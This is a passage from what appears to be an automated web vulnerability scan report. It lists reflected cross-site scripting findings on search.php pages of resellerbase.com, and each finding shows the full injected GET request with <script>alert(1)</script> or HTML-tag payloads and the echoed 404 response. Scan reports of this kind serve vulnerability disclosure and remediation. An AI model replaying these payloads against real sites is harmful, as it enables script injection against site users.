Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php92b5d<script>alert(1)</script>a21e752ed40?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.285. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f3964<a>e4494b9a37f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf3964<a>e4494b9a37f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf3964<a>e4494b9a37f&opt=2 was not found on this server.</p>
...[SNIP]...

2.286. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b56c<a>65120a4dae was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...2b56c<a>65120a4dae&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...2b56c<a>65120a4dae&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.287. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7a9c<script>alert(1)</script>63816aeb1cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c7a9c<script>alert(1)</script>63816aeb1cb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c7a9c<script>alert(1)</script>63816aeb1cb=1 was not found on this server.</p>
...[SNIP]...

2.288. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b9f3e<a>c64c1bc135b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b9f3e<a>c64c1bc135b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b9f3e<a>c64c1bc135b was not found on this server.</p>
...[SNIP]...

2.289. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81a27<script>alert(1)</script>3ac780cc3e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult81a27<script>alert(1)</script>3ac780cc3e2/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult81a27<script>alert(1)</script>3ac780cc3e2/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.290. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9821<script>alert(1)</script>7343903db41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingf9821<script>alert(1)</script>7343903db41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingf9821<script>alert(1)</script>7343903db41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.291. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65c60<script>alert(1)</script>e876b8ee22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes65c60<script>alert(1)</script>e876b8ee22c/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes65c60<script>alert(1)</script>e876b8ee22c/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.292. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7a51<script>alert(1)</script>f62df4da823 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosb7a51<script>alert(1)</script>f62df4da823/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosb7a51<script>alert(1)</script>f62df4da823/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.293. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75234<script>alert(1)</script>e8836e38aca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/search.php75234<script>alert(1)</script>e8836e38aca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php75234<script>alert(1)</script>e8836e38aca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.294. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 63954<a>d0776f12aec was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search63954<a>d0776f12aec&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search63954<a>d0776f12aec&opt=2 was not found on this server.</p>
...[SNIP]...

2.295. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1a1ff<a>700f98bb490 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...1a1ff<a>700f98bb490&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...1a1ff<a>700f98bb490&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.296. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ee202<script>alert(1)</script>b3390fc92dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ee202<script>alert(1)</script>b3390fc92dd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ee202<script>alert(1)</script>b3390fc92dd=1 was not found on this server.</p>
...[SNIP]...

2.297. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8a7bc<a>01a8494ddb5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28a7bc<a>01a8494ddb5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28a7bc<a>01a8494ddb5 was not found on this server.</p>
...[SNIP]...

2.298. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8812a<script>alert(1)</script>0b6ae324a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8812a<script>alert(1)</script>0b6ae324a/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8812a<script>alert(1)</script>0b6ae324a/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.299. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e3b4<script>alert(1)</script>fe977d32c67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating1e3b4<script>alert(1)</script>fe977d32c67/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating1e3b4<script>alert(1)</script>fe977d32c67/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.300. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a2b54<script>alert(1)</script>b775ca99d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themesa2b54<script>alert(1)</script>b775ca99d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themesa2b54<script>alert(1)</script>b775ca99d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.301. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d1cb<script>alert(1)</script>64451e5fca3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/search.php6d1cb<script>alert(1)</script>64451e5fca3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php6d1cb<script>alert(1)</script>64451e5fca3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.302. http://www.resellerbase.com/adult/personals-dating/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
